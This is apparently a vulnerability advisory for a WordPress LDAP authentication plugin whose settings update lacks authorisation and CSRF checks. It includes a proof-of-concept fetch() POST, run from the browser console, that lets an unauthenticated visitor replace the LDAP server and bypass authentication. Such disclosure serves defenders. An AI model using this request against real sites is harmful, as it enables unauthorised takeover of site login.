The plugin does not have any authorisation and CSRF checks when updating it's settings (which are hooked to the init action), allowing unauthenticated attackers to update them. Attackers could set their own LDAP server to be used to authenticated users, therefore bypassing the current authentication
Run the below command in the developer console of the web browser while being on the blog as an unauthenticated user fetch("/", { "headers": { "content-type": "application/x-www-form-urlencoded", }, "method": "POST", "body": 'action=ldapConfig&ldapConfig_nonce=-&ldapURI=127.0.0.1&ldapEncrpytMethod=ldap&ldapport=389&ldapDN=user%40localhost&ldappassword=password', "credentials": "include" }).then(response => response.text()) .then(data => console.log(data));
Lana Codes
Lana Codes
Yes
2022-09-05 (about 8 months ago)
2022-09-05 (about 8 months ago)
2022-09-05 (about 8 months ago)